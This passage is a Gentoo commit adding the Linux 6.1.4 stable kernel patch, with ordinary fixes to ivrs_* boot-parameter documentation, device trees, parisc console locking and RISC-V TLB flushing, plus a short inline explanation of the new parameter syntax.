Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sat Jan  7 11:10:44 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sat Jan  7 11:10:44 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=09615b5d

Linux patch 6.1.4

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README            |    4 +
 1003_linux-6.1.4.patch | 8792 ++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 8796 insertions(+)

diff --git a/0000_README b/0000_README
index 1fe5b8d9..9fb9179d 100644
--- a/0000_README
+++ b/0000_README
@@ -55,6 +55,10 @@ Patch:  1002_linux-6.1.3.patch
 From:   http://www.kernel.org
 Desc:   Linux 6.1.3
 
+Patch:  1003_linux-6.1.4.patch
+From:   http://www.kernel.org
+Desc:   Linux 6.1.4
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1003_linux-6.1.4.patch b/1003_linux-6.1.4.patch
new file mode 100644
index 00000000..894610d5
--- /dev/null
+++ b/1003_linux-6.1.4.patch
@@ -0,0 +1,8792 @@
+diff --git a/Documentation/admin-guide/kernel-parameters.txt b/Documentation/admin-guide/kernel-parameters.txt
+index 42af9ca0127e5..6b838869554b1 100644
+--- a/Documentation/admin-guide/kernel-parameters.txt
++++ b/Documentation/admin-guide/kernel-parameters.txt
+@@ -2300,7 +2300,13 @@
+ 			Provide an override to the IOAPIC-ID<->DEVICE-ID
+ 			mapping provided in the IVRS ACPI table.
+ 			By default, PCI segment is 0, and can be omitted.
+-			For example:
++
++			For example, to map IOAPIC-ID decimal 10 to
++			PCI segment 0x1 and PCI device 00:14.0,
++			write the parameter as:
++				ivrs_ioapic=10@0001:00:14.0
++
++			Deprecated formats:
+ 			* To map IOAPIC-ID decimal 10 to PCI device 00:14.0
+ 			  write the parameter as:
+ 				ivrs_ioapic[10]=00:14.0
+@@ -2312,7 +2318,13 @@
+ 			Provide an override to the HPET-ID<->DEVICE-ID
+ 			mapping provided in the IVRS ACPI table.
+ 			By default, PCI segment is 0, and can be omitted.
+-			For example:
++
++			For example, to map HPET-ID decimal 10 to
++			PCI segment 0x1 and PCI device 00:14.0,
++			write the parameter as:
++				ivrs_hpet=10@0001:00:14.0
++
++			Deprecated formats:
+ 			* To map HPET-ID decimal 0 to PCI device 00:14.0
+ 			  write the parameter as:
+ 				ivrs_hpet[0]=00:14.0
+@@ -2323,15 +2335,20 @@
+ 	ivrs_acpihid	[HW,X86-64]
+ 			Provide an override to the ACPI-HID:UID<->DEVICE-ID
+ 			mapping provided in the IVRS ACPI table.
++			By default, PCI segment is 0, and can be omitted.
+ 
+ 			For example, to map UART-HID:UID AMD0020:0 to
+ 			PCI segment 0x1 and PCI device ID 00:14.5,
+ 			write the parameter as:
+-				ivrs_acpihid[0001:00:14.5]=AMD0020:0
++				ivrs_acpihid=AMD0020:0@0001:00:14.5
+ 
+-			By default, PCI segment is 0, and can be omitted.
+-			For example, PCI device 00:14.5 write the parameter as:
++			Deprecated formats:
++			* To map UART-HID:UID AMD0020:0 to PCI segment 0,
++			  PCI device ID 00:14.5, write the parameter as:
+ 				ivrs_acpihid[00:14.5]=AMD0020:0
++			* To map UART-HID:UID AMD0020:0 to PCI segment 0x1 and
++			  PCI device ID 00:14.5, write the parameter as:
++				ivrs_acpihid[0001:00:14.5]=AMD0020:0
+ 
+ 	js=		[HW,JOY] Analog joystick
+ 			See Documentation/input/joydev/joystick.rst.
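
Taken together, the three kernel-parameters hunks above settle on one segment-aware syntax, id@segment:bus:dev.fn, and demote the bracketed forms to deprecated. A boot line combining all three overrides might look like this (device addresses are illustrative only):

    ivrs_ioapic=10@0001:00:14.0 ivrs_hpet=0@0000:00:14.0 ivrs_acpihid=AMD0020:0@0001:00:14.5
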
+diff --git a/Documentation/filesystems/mount_api.rst b/Documentation/filesystems/mount_api.rst
+index eb358a00be279..1d16787a00e95 100644
+--- a/Documentation/filesystems/mount_api.rst
++++ b/Documentation/filesystems/mount_api.rst
+@@ -814,6 +814,7 @@ process the parameters it is given.
+        int fs_lookup_param(struct fs_context *fc,
+ 			   struct fs_parameter *value,
+ 			   bool want_bdev,
++			   unsigned int flags,
+ 			   struct path *_path);
+ 
+      This takes a parameter that carries a string or filename type and attempts
+diff --git a/Makefile b/Makefile
+index a69d14983a489..56afd1509c74f 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 3
++SUBLEVEL = 4
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm/nwfpe/Makefile b/arch/arm/nwfpe/Makefile
+index 303400fa2cdf7..2aec85ab1e8b9 100644
+--- a/arch/arm/nwfpe/Makefile
++++ b/arch/arm/nwfpe/Makefile
+@@ -11,3 +11,9 @@ nwfpe-y				+= fpa11.o fpa11_cpdo.o fpa11_cpdt.o \
+ 				   entry.o
+ 
+ nwfpe-$(CONFIG_FPE_NWFPE_XP)	+= extended_cpdo.o
++
++# Try really hard to avoid generating calls to __aeabi_uldivmod() from
++# float64_rem() due to loop elision.
++ifdef CONFIG_CC_IS_CLANG
++CFLAGS_softfloat.o	+= -mllvm -replexitval=never
++endif
+diff --git a/arch/arm64/boot/dts/mediatek/mt8195-demo.dts b/arch/arm64/boot/dts/mediatek/mt8195-demo.dts
+index 4fbd99eb496a2..dec85d2548384 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8195-demo.dts
++++ b/arch/arm64/boot/dts/mediatek/mt8195-demo.dts
+@@ -56,10 +56,10 @@
+ 		#size-cells = <2>;
+ 		ranges;
+ 
+-		/* 192 KiB reserved for ARM Trusted Firmware (BL31) */
++		/* 2 MiB reserved for ARM Trusted Firmware (BL31) */
+ 		bl31_secmon_reserved: secmon@54600000 {
+ 			no-map;
+-			reg = <0 0x54600000 0x0 0x30000>;
++			reg = <0 0x54600000 0x0 0x200000>;
+ 		};
+ 
+ 		/* 12 MiB reserved for OP-TEE (BL32)
+diff --git a/arch/arm64/boot/dts/qcom/sc8280xp.dtsi b/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
+index 212d63d5cbf28..9f2a136d5cbc5 100644
+--- a/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
+@@ -855,12 +855,13 @@
+ 			required-opps = <&rpmhpd_opp_nom>;
+ 
+ 			iommus = <&apps_smmu 0xe0 0x0>;
++			dma-coherent;
+ 
+ 			clocks = <&gcc GCC_UFS_PHY_AXI_CLK>,
+ 				 <&gcc GCC_AGGRE_UFS_PHY_AXI_CLK>,
+ 				 <&gcc GCC_UFS_PHY_AHB_CLK>,
+ 				 <&gcc GCC_UFS_PHY_UNIPRO_CORE_CLK>,
+-				 <&rpmhcc RPMH_CXO_CLK>,
++				 <&gcc GCC_UFS_REF_CLKREF_CLK>,
+ 				 <&gcc GCC_UFS_PHY_TX_SYMBOL_0_CLK>,
+ 				 <&gcc GCC_UFS_PHY_RX_SYMBOL_0_CLK>,
+ 				 <&gcc GCC_UFS_PHY_RX_SYMBOL_1_CLK>;
+@@ -891,7 +892,7 @@
+ 			ranges;
+ 			clock-names = "ref",
+ 				      "ref_aux";
+-			clocks = <&gcc GCC_UFS_REF_CLKREF_CLK>,
++			clocks = <&gcc GCC_UFS_CARD_CLKREF_CLK>,
+ 				 <&gcc GCC_UFS_PHY_PHY_AUX_CLK>;
+ 
+ 			resets = <&ufs_mem_hc 0>;
+@@ -923,12 +924,13 @@
+ 			power-domains = <&gcc UFS_CARD_GDSC>;
+ 
+ 			iommus = <&apps_smmu 0x4a0 0x0>;
++			dma-coherent;
+ 
+ 			clocks = <&gcc GCC_UFS_CARD_AXI_CLK>,
+ 				 <&gcc GCC_AGGRE_UFS_CARD_AXI_CLK>,
+ 				 <&gcc GCC_UFS_CARD_AHB_CLK>,
+ 				 <&gcc GCC_UFS_CARD_UNIPRO_CORE_CLK>,
+-				 <&rpmhcc RPMH_CXO_CLK>,
++				 <&gcc GCC_UFS_REF_CLKREF_CLK>,
+ 				 <&gcc GCC_UFS_CARD_TX_SYMBOL_0_CLK>,
+ 				 <&gcc GCC_UFS_CARD_RX_SYMBOL_0_CLK>,
+ 				 <&gcc GCC_UFS_CARD_RX_SYMBOL_1_CLK>;
+@@ -959,7 +961,7 @@
+ 			ranges;
+ 			clock-names = "ref",
+ 				      "ref_aux";
+-			clocks = <&gcc GCC_UFS_REF_CLKREF_CLK>,
++			clocks = <&gcc GCC_UFS_1_CARD_CLKREF_CLK>,
+ 				 <&gcc GCC_UFS_CARD_PHY_AUX_CLK>;
+ 
+ 			resets = <&ufs_card_hc 0>;
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-db845c.dts b/arch/arm64/boot/dts/qcom/sdm845-db845c.dts
+index 132417e2d11e5..a3e15dedd60cb 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-db845c.dts
++++ b/arch/arm64/boot/dts/qcom/sdm845-db845c.dts
+@@ -1123,7 +1123,10 @@
+ 
+ /* PINCTRL - additions to nodes defined in sdm845.dtsi */
+ &qup_spi2_default {
+-	drive-strength = <16>;
++	pinconf {
++		pins = "gpio27", "gpio28", "gpio29", "gpio30";
++		drive-strength = <16>;
++	};
+ };
+ 
+ &qup_uart3_default{
+diff --git a/arch/arm64/boot/dts/qcom/sdm850-lenovo-yoga-c630.dts b/arch/arm64/boot/dts/qcom/sdm850-lenovo-yoga-c630.dts
+index be59a8ba9c1fe..74f43da51fa50 100644
+--- a/arch/arm64/boot/dts/qcom/sdm850-lenovo-yoga-c630.dts
++++ b/arch/arm64/boot/dts/qcom/sdm850-lenovo-yoga-c630.dts
+@@ -487,8 +487,10 @@
+ };
+ 
+ &qup_i2c12_default {
+-	drive-strength = <2>;
+-	bias-disable;
++	pinmux {
++		drive-strength = <2>;
++		bias-disable;
++	};
+ };
+ 
+ &qup_uart6_default {
+diff --git a/arch/arm64/boot/dts/qcom/sdm850-samsung-w737.dts b/arch/arm64/boot/dts/qcom/sdm850-samsung-w737.dts
+index f954fe5cb61ab..d028a7eb364a6 100644
+--- a/arch/arm64/boot/dts/qcom/sdm850-samsung-w737.dts
++++ b/arch/arm64/boot/dts/qcom/sdm850-samsung-w737.dts
+@@ -415,8 +415,10 @@
+ };
+ 
+ &qup_i2c12_default {
+-	drive-strength = <2>;
+-	bias-disable;
++	pinmux {
++		drive-strength = <2>;
++		bias-disable;
++	};
+ };
+ 
+ &qup_uart6_default {
+diff --git a/arch/arm64/kernel/stacktrace.c b/arch/arm64/kernel/stacktrace.c
+index 634279b3b03d1..117e2c180f3c7 100644
+--- a/arch/arm64/kernel/stacktrace.c
++++ b/arch/arm64/kernel/stacktrace.c
+@@ -23,8 +23,8 @@
+  *
+  * The regs must be on a stack currently owned by the calling task.
+  */
+-static inline void unwind_init_from_regs(struct unwind_state *state,
+-					 struct pt_regs *regs)
++static __always_inline void unwind_init_from_regs(struct unwind_state *state,
++						  struct pt_regs *regs)
+ {
+ 	unwind_init_common(state, current);
+ 
+@@ -58,8 +58,8 @@ static __always_inline void unwind_init_from_caller(struct unwind_state *state)
+  * duration of the unwind, or the unwind will be bogus. It is never valid to
+  * call this for the current task.
+  */
+-static inline void unwind_init_from_task(struct unwind_state *state,
+-					 struct task_struct *task)
++static __always_inline void unwind_init_from_task(struct unwind_state *state,
++						  struct task_struct *task)
+ {
+ 	unwind_init_common(state, task);
+ 
+@@ -186,7 +186,7 @@ void show_stack(struct task_struct *tsk, unsigned long *sp, const char *loglvl)
+ 			: stackinfo_get_unknown();		\
+ 	})
+ 
+-noinline notrace void arch_stack_walk(stack_trace_consume_fn consume_entry,
++noinline noinstr void arch_stack_walk(stack_trace_consume_fn consume_entry,
+ 			      void *cookie, struct task_struct *task,
+ 			      struct pt_regs *regs)
+ {
+diff --git a/arch/parisc/include/asm/pgtable.h b/arch/parisc/include/asm/pgtable.h
+index ecd0288544698..68ae77069d23f 100644
+--- a/arch/parisc/include/asm/pgtable.h
++++ b/arch/parisc/include/asm/pgtable.h
+@@ -166,8 +166,8 @@ extern void __update_cache(pte_t pte);
+ 
+ /* This calculates the number of initial pages we need for the initial
+  * page tables */
+-#if (KERNEL_INITIAL_ORDER) >= (PMD_SHIFT)
+-# define PT_INITIAL	(1 << (KERNEL_INITIAL_ORDER - PMD_SHIFT))
++#if (KERNEL_INITIAL_ORDER) >= (PLD_SHIFT + BITS_PER_PTE)
++# define PT_INITIAL	(1 << (KERNEL_INITIAL_ORDER - PLD_SHIFT - BITS_PER_PTE))
+ #else
+ # define PT_INITIAL	(1)  /* all initial PTEs fit into one page */
+ #endif
+diff --git a/arch/parisc/kernel/firmware.c b/arch/parisc/kernel/firmware.c
+index 6a7e315bcc2e5..a115315d88e69 100644
+--- a/arch/parisc/kernel/firmware.c
++++ b/arch/parisc/kernel/firmware.c
+@@ -1288,9 +1288,8 @@ void pdc_io_reset_devices(void)
+ 
+ #endif /* defined(BOOTLOADER) */
+ 
+-/* locked by pdc_console_lock */
+-static int __attribute__((aligned(8)))   iodc_retbuf[32];
+-static char __attribute__((aligned(64))) iodc_dbuf[4096];
++/* locked by pdc_lock */
++static char iodc_dbuf[4096] __page_aligned_bss;
+ 
+ /**
+  * pdc_iodc_print - Console print using IODC.
+@@ -1307,6 +1306,9 @@ int pdc_iodc_print(const unsigned char *str, unsigned count)
+ 	unsigned int i;
+ 	unsigned long flags;
+ 
++	count = min_t(unsigned int, count, sizeof(iodc_dbuf));
++
++	spin_lock_irqsave(&pdc_lock, flags);
+ 	for (i = 0; i < count;) {
+ 		switch(str[i]) {
+ 		case '\n':
+@@ -1322,12 +1324,11 @@ int pdc_iodc_print(const unsigned char *str, unsigned count)
+ 	}
+ 
+ print:
+-        spin_lock_irqsave(&pdc_lock, flags);
+-        real32_call(PAGE0->mem_cons.iodc_io,
+-                    (unsigned long)PAGE0->mem_cons.hpa, ENTRY_IO_COUT,
+-                    PAGE0->mem_cons.spa, __pa(PAGE0->mem_cons.dp.layers),
+-                    __pa(iodc_retbuf), 0, __pa(iodc_dbuf), i, 0);
+-        spin_unlock_irqrestore(&pdc_lock, flags);
++	real32_call(PAGE0->mem_cons.iodc_io,
++		(unsigned long)PAGE0->mem_cons.hpa, ENTRY_IO_COUT,
++		PAGE0->mem_cons.spa, __pa(PAGE0->mem_cons.dp.layers),
++		__pa(pdc_result), 0, __pa(iodc_dbuf), i, 0);
++	spin_unlock_irqrestore(&pdc_lock, flags);
+ 
+ 	return i;
+ }
+@@ -1354,10 +1355,11 @@ int pdc_iodc_getc(void)
+ 	real32_call(PAGE0->mem_kbd.iodc_io,
+ 		    (unsigned long)PAGE0->mem_kbd.hpa, ENTRY_IO_CIN,
+ 		    PAGE0->mem_kbd.spa, __pa(PAGE0->mem_kbd.dp.layers), 
+-		    __pa(iodc_retbuf), 0, __pa(iodc_dbuf), 1, 0);
++		    __pa(pdc_result), 0, __pa(iodc_dbuf), 1, 0);
+ 
+ 	ch = *iodc_dbuf;
+-	status = *iodc_retbuf;
++	/* like convert_to_wide() but for first return value only: */
++	status = *(int *)&pdc_result;
+ 	spin_unlock_irqrestore(&pdc_lock, flags);
+ 
+ 	if (status == 0)
+diff --git a/arch/parisc/kernel/kgdb.c b/arch/parisc/kernel/kgdb.c
+index ab7620f695be1..b16fa9bac5f44 100644
+--- a/arch/parisc/kernel/kgdb.c
++++ b/arch/parisc/kernel/kgdb.c
+@@ -208,23 +208,3 @@ int kgdb_arch_handle_exception(int trap, int signo,
+ 	}
+ 	return -1;
+ }
+-
+-/* KGDB console driver which uses PDC to read chars from keyboard */
+-
+-static void kgdb_pdc_write_char(u8 chr)
+-{
+-	/* no need to print char. kgdb will do it. */
+-}
+-
+-static struct kgdb_io kgdb_pdc_io_ops = {
+-	.name		= "kgdb_pdc",
+-	.read_char	= pdc_iodc_getc,
+-	.write_char	= kgdb_pdc_write_char,
+-};
+-
+-static int __init kgdb_pdc_init(void)
+-{
+-	kgdb_register_io_module(&kgdb_pdc_io_ops);
+-	return 0;
+-}
+-early_initcall(kgdb_pdc_init);
+diff --git a/arch/parisc/kernel/pdc_cons.c b/arch/parisc/kernel/pdc_cons.c
+index 7d0989f523d03..cf3bf82323746 100644
+--- a/arch/parisc/kernel/pdc_cons.c
++++ b/arch/parisc/kernel/pdc_cons.c
+@@ -12,37 +12,27 @@
+ #include <asm/page.h>		/* for PAGE0 */
+ #include <asm/pdc.h>		/* for iodc_call() proto and friends */
+ 
+-static DEFINE_SPINLOCK(pdc_console_lock);
+-
+ static void pdc_console_write(struct console *co, const char *s, unsigned count)
+ {
+ 	int i = 0;
+-	unsigned long flags;
+ 
+-	spin_lock_irqsave(&pdc_console_lock, flags);
+ 	do {
+ 		i += pdc_iodc_print(s + i, count - i);
+ 	} while (i < count);
+-	spin_unlock_irqrestore(&pdc_console_lock, flags);
+ }
+ 
+ #ifdef CONFIG_KGDB
+ static int kgdb_pdc_read_char(void)
+ {
+-	int c;
+-	unsigned long flags;
+-
+-	spin_lock_irqsave(&pdc_console_lock, flags);
+-	c = pdc_iodc_getc();
+-	spin_unlock_irqrestore(&pdc_console_lock, flags);
++	int c = pdc_iodc_getc();
+ 
+ 	return (c <= 0) ? NO_POLL_CHAR : c;
+ }
+ 
+ static void kgdb_pdc_write_char(u8 chr)
+ {
+-	if (PAGE0->mem_cons.cl_class != CL_DUPLEX)
+-		pdc_console_write(NULL, &chr, 1);
++	/* no need to print char as it's shown on standard console */
++	/* pdc_iodc_print(&chr, 1); */
+ }
+ 
+ static struct kgdb_io kgdb_pdc_io_ops = {
+diff --git a/arch/parisc/kernel/vdso32/Makefile b/arch/parisc/kernel/vdso32/Makefile
+index 85b1c6d261d12..4459a48d23033 100644
+--- a/arch/parisc/kernel/vdso32/Makefile
++++ b/arch/parisc/kernel/vdso32/Makefile
+@@ -26,7 +26,7 @@ $(obj)/vdso32_wrapper.o : $(obj)/vdso32.so FORCE
+ 
+ # Force dependency (incbin is bad)
+ # link rule for the .so file, .lds has to be first
+-$(obj)/vdso32.so: $(src)/vdso32.lds $(obj-vdso32) $(obj-cvdso32) $(VDSO_LIBGCC)
++$(obj)/vdso32.so: $(src)/vdso32.lds $(obj-vdso32) $(obj-cvdso32) $(VDSO_LIBGCC) FORCE
+ 	$(call if_changed,vdso32ld)
+ 
+ # assembly rules for the .S files
+@@ -38,7 +38,7 @@ $(obj-cvdso32): %.o: %.c FORCE
+ 
+ # actual build commands
+ quiet_cmd_vdso32ld = VDSO32L $@
+-      cmd_vdso32ld = $(CROSS32CC) $(c_flags) -Wl,-T $^ -o $@
++      cmd_vdso32ld = $(CROSS32CC) $(c_flags) -Wl,-T $(filter-out FORCE, $^) -o $@
+ quiet_cmd_vdso32as = VDSO32A $@
+       cmd_vdso32as = $(CROSS32CC) $(a_flags) -c -o $@ $<
+ quiet_cmd_vdso32cc = VDSO32C $@
+diff --git a/arch/parisc/kernel/vdso64/Makefile b/arch/parisc/kernel/vdso64/Makefile
+index a30f5ec5eb4bf..f3d6045793f4c 100644
+--- a/arch/parisc/kernel/vdso64/Makefile
++++ b/arch/parisc/kernel/vdso64/Makefile
+@@ -26,7 +26,7 @@ $(obj)/vdso64_wrapper.o : $(obj)/vdso64.so FORCE
+ 
+ # Force dependency (incbin is bad)
+ # link rule for the .so file, .lds has to be first
+-$(obj)/vdso64.so: $(src)/vdso64.lds $(obj-vdso64) $(VDSO_LIBGCC)
++$(obj)/vdso64.so: $(src)/vdso64.lds $(obj-vdso64) $(VDSO_LIBGCC) FORCE
+ 	$(call if_changed,vdso64ld)
+ 
+ # assembly rules for the .S files
+@@ -35,7 +35,7 @@ $(obj-vdso64): %.o: %.S FORCE
+ 
+ # actual build commands
+ quiet_cmd_vdso64ld = VDSO64L $@
+-      cmd_vdso64ld = $(CC) $(c_flags) -Wl,-T $^ -o $@
++      cmd_vdso64ld = $(CC) $(c_flags) -Wl,-T $(filter-out FORCE, $^) -o $@
+ quiet_cmd_vdso64as = VDSO64A $@
+       cmd_vdso64as = $(CC) $(a_flags) -c -o $@ $<
+ 
+diff --git a/arch/powerpc/include/asm/ftrace.h b/arch/powerpc/include/asm/ftrace.h
+index 3cee7115441b4..e3d1f377bc5b5 100644
+--- a/arch/powerpc/include/asm/ftrace.h
++++ b/arch/powerpc/include/asm/ftrace.h
+@@ -64,17 +64,6 @@ void ftrace_graph_func(unsigned long ip, unsigned long parent_ip,
+  * those.
+  */
+ #define ARCH_HAS_SYSCALL_MATCH_SYM_NAME
+-#ifdef CONFIG_PPC64_ELF_ABI_V1
+-static inline bool arch_syscall_match_sym_name(const char *sym, const char *name)
+-{
+-	/* We need to skip past the initial dot, and the __se_sys alias */
+-	return !strcmp(sym + 1, name) ||
+-		(!strncmp(sym, ".__se_sys", 9) && !strcmp(sym + 6, name)) ||
+-		(!strncmp(sym, ".ppc_", 5) && !strcmp(sym + 5, name + 4)) ||
+-		(!strncmp(sym, ".ppc32_", 7) && !strcmp(sym + 7, name + 4)) ||
+-		(!strncmp(sym, ".ppc64_", 7) && !strcmp(sym + 7, name + 4));
+-}
+-#else
+ static inline bool arch_syscall_match_sym_name(const char *sym, const char *name)
+ {
+ 	return !strcmp(sym, name) ||
+@@ -83,7 +72,6 @@ static inline bool arch_syscall_match_sym_name(const char *sym, const char *name
+ 		(!strncmp(sym, "ppc32_", 6) && !strcmp(sym + 6, name + 4)) ||
+ 		(!strncmp(sym, "ppc64_", 6) && !strcmp(sym + 6, name + 4));
+ }
+-#endif /* CONFIG_PPC64_ELF_ABI_V1 */
+ #endif /* CONFIG_FTRACE_SYSCALLS */
+ 
+ #if defined(CONFIG_PPC64) && defined(CONFIG_FUNCTION_TRACER)
+diff --git a/arch/riscv/Kconfig b/arch/riscv/Kconfig
+index 593cf09264d80..8e5fd56820189 100644
+--- a/arch/riscv/Kconfig
++++ b/arch/riscv/Kconfig
+@@ -502,7 +502,7 @@ config KEXEC_FILE
+ 	select KEXEC_CORE
+ 	select KEXEC_ELF
+ 	select HAVE_IMA_KEXEC if IMA
+-	depends on 64BIT
++	depends on 64BIT && MMU
+ 	help
+ 	  This is new version of kexec system call. This system call is
+ 	  file based and takes file descriptors as system call argument
+diff --git a/arch/riscv/include/asm/kexec.h b/arch/riscv/include/asm/kexec.h
+index eee260e8ab308..2b56769cb530c 100644
+--- a/arch/riscv/include/asm/kexec.h
++++ b/arch/riscv/include/asm/kexec.h
+@@ -39,6 +39,7 @@ crash_setup_regs(struct pt_regs *newregs,
+ #define ARCH_HAS_KIMAGE_ARCH
+ 
+ struct kimage_arch {
++	void *fdt; /* For CONFIG_KEXEC_FILE */
+ 	unsigned long fdt_addr;
+ };
+ 
+@@ -62,6 +63,10 @@ int arch_kexec_apply_relocations_add(struct purgatory_info *pi,
+ 				     const Elf_Shdr *relsec,
+ 				     const Elf_Shdr *symtab);
+ #define arch_kexec_apply_relocations_add arch_kexec_apply_relocations_add
++
++struct kimage;
++int arch_kimage_file_post_load_cleanup(struct kimage *image);
++#define arch_kimage_file_post_load_cleanup arch_kimage_file_post_load_cleanup
+ #endif
+ 
+ #endif
+diff --git a/arch/riscv/include/asm/mmu.h b/arch/riscv/include/asm/mmu.h
+index 0099dc1161683..5ff1f19fd45c2 100644
+--- a/arch/riscv/include/asm/mmu.h
++++ b/arch/riscv/include/asm/mmu.h
+@@ -19,6 +19,8 @@ typedef struct {
+ #ifdef CONFIG_SMP
+ 	/* A local icache flush is needed before user execution can resume. */
+ 	cpumask_t icache_stale_mask;
++	/* A local tlb flush is needed before user execution can resume. */
++	cpumask_t tlb_stale_mask;
+ #endif
+ } mm_context_t;
+ 
+diff --git a/arch/riscv/include/asm/pgtable.h b/arch/riscv/include/asm/pgtable.h
+index 92ec2d9d7273f..ec6fb83349ced 100644
+--- a/arch/riscv/include/asm/pgtable.h
++++ b/arch/riscv/include/asm/pgtable.h
+@@ -415,7 +415,7 @@ static inline void update_mmu_cache(struct vm_area_struct *vma,
+ 	 * Relying on flush_tlb_fix_spurious_fault would suffice, but
+ 	 * the extra traps reduce performance.  So, eagerly SFENCE.VMA.
+ 	 */
+-	local_flush_tlb_page(address);
++	flush_tlb_page(vma, address);
+ }
+ 
+ static inline void update_mmu_cache_pmd(struct vm_area_struct *vma,
+diff --git a/arch/riscv/include/asm/tlbflush.h b/arch/riscv/include/asm/tlbflush.h
+index 801019381dea3..907b9efd39a87 100644
+--- a/arch/riscv/include/asm/tlbflush.h
++++ b/arch/riscv/include/asm/tlbflush.h
+@@ -22,6 +22,24 @@ static inline void local_flush_tlb_page(unsigned long addr)
+ {
+ 	ALT_FLUSH_TLB_PAGE(__asm__ __volatile__ ("sfence.vma %0" : : "r" (addr) : "memory"));
+ }
++
++static inline void local_flush_tlb_all_asid(unsigned long asid)
++{
++	__asm__ __volatile__ ("sfence.vma x0, %0"
++			:
++			: "r" (asid)
++			: "memory");
++}
++
++static inline void local_flush_tlb_page_asid(unsigned long addr,
++		unsigned long asid)
++{
++	__asm__ __volatile__ ("sfence.vma %0, %1"
++			:
++			: "r" (addr), "r" (asid)
++			: "memory");
++}
++
+ #else /* CONFIG_MMU */
+ #define local_flush_tlb_all()			do { } while (0)
+ #define local_flush_tlb_page(addr)		do { } while (0)
+diff --git a/arch/riscv/kernel/elf_kexec.c b/arch/riscv/kernel/elf_kexec.c
+index 0cb94992c15b3..5372b708fae21 100644
+--- a/arch/riscv/kernel/elf_kexec.c
++++ b/arch/riscv/kernel/elf_kexec.c
+@@ -21,6 +21,18 @@
+ #include <linux/memblock.h>
+ #include <asm/setup.h>
+ 
++int arch_kimage_file_post_load_cleanup(struct kimage *image)
++{
++	kvfree(image->arch.fdt);
++	image->arch.fdt = NULL;
++
++	vfree(image->elf_headers);
++	image->elf_headers = NULL;
++	image->elf_headers_sz = 0;
++
++	return kexec_image_post_load_cleanup_default(image);
++}
++
+ static int riscv_kexec_elf_load(struct kimage *image, struct elfhdr *ehdr,
+ 				struct kexec_elf_info *elf_info, unsigned long old_pbase,
+ 				unsigned long new_pbase)
+@@ -298,6 +310,8 @@ static void *elf_kexec_load(struct kimage *image, char *kernel_buf,
+ 		pr_err("Error add DTB kbuf ret=%d\n", ret);
+ 		goto out_free_fdt;
+ 	}
++	/* Cache the fdt buffer address for memory cleanup */
++	image->arch.fdt = fdt;
+ 	pr_notice("Loaded device tree at 0x%lx\n", kbuf.mem);
+ 	goto out;
+ 
+diff --git a/arch/riscv/kernel/stacktrace.c b/arch/riscv/kernel/stacktrace.c
+index 08d11a53f39e7..bcfe9eb55f80f 100644
+--- a/arch/riscv/kernel/stacktrace.c
++++ b/arch/riscv/kernel/stacktrace.c
+@@ -58,7 +58,7 @@ void notrace walk_stackframe(struct task_struct *task, struct pt_regs *regs,
+ 		} else {
+ 			fp = frame->fp;
+ 			pc = ftrace_graph_ret_addr(current, NULL, frame->ra,
+-						   (unsigned long *)(fp - 8));
++						   &frame->ra);
+ 		}
+ 
+ 	}
+diff --git a/arch/riscv/mm/context.c b/arch/riscv/mm/context.c
+index 7acbfbd14557e..80ce9caba8d22 100644
+--- a/arch/riscv/mm/context.c
++++ b/arch/riscv/mm/context.c
+@@ -196,6 +196,16 @@ switch_mm_fast:
+ 
+ 	if (need_flush_tlb)
+ 		local_flush_tlb_all();
++#ifdef CONFIG_SMP
++	else {
++		cpumask_t *mask = &mm->context.tlb_stale_mask;
++
++		if (cpumask_test_cpu(cpu, mask)) {
++			cpumask_clear_cpu(cpu, mask);
++			local_flush_tlb_all_asid(cntx & asid_mask);
++		}
++	}
++#endif
+ }
+ 
+ static void set_mm_noasid(struct mm_struct *mm)
+diff --git a/arch/riscv/mm/tlbflush.c b/arch/riscv/mm/tlbflush.c
+index 37ed760d007c3..ce7dfc81bb3fe 100644
+--- a/arch/riscv/mm/tlbflush.c
++++ b/arch/riscv/mm/tlbflush.c
+@@ -5,23 +5,7 @@
+ #include <linux/sched.h>
+ #include <asm/sbi.h>
+ #include <asm/mmu_context.h>
+-
+-static inline void local_flush_tlb_all_asid(unsigned long asid)
+-{
+-	__asm__ __volatile__ ("sfence.vma x0, %0"
+-			:
+-			: "r" (asid)
+-			: "memory");
+-}
+-
+-static inline void local_flush_tlb_page_asid(unsigned long addr,
+-		unsigned long asid)
+-{
+-	__asm__ __volatile__ ("sfence.vma %0, %1"
+-			:
+-			: "r" (addr), "r" (asid)
+-			: "memory");
+-}
++#include <asm/tlbflush.h>
+ 
+ void flush_tlb_all(void)
+ {
+@@ -31,6 +15,7 @@ void flush_tlb_all(void)
+ static void __sbi_tlb_flush_range(struct mm_struct *mm, unsigned long start,
+ 				  unsigned long size, unsigned long stride)
+ {
++	struct cpumask *pmask = &mm->context.tlb_stale_mask;
+ 	struct cpumask *cmask = mm_cpumask(mm);
+ 	unsigned int cpuid;
+ 	bool broadcast;
+@@ -44,6 +29,15 @@ static void __sbi_tlb_flush_range(struct mm_struct *mm, unsigned long start,
+ 	if (static_branch_unlikely(&use_asid_allocator)) {
+ 		unsigned long asid = atomic_long_read(&mm->context.id);
+ 
++		/*
++		 * TLB will be immediately flushed on harts concurrently
++		 * executing this MM context. TLB flush on other harts
++		 * is deferred until this MM context migrates there.
++		 */
++		cpumask_setall(pmask);
++		cpumask_clear_cpu(cpuid, pmask);
++		cpumask_andnot(pmask, pmask, cmask);
++
+ 		if (broadcast) {
+ 			sbi_remote_sfence_vma_asid(cmask, start, size, asid);
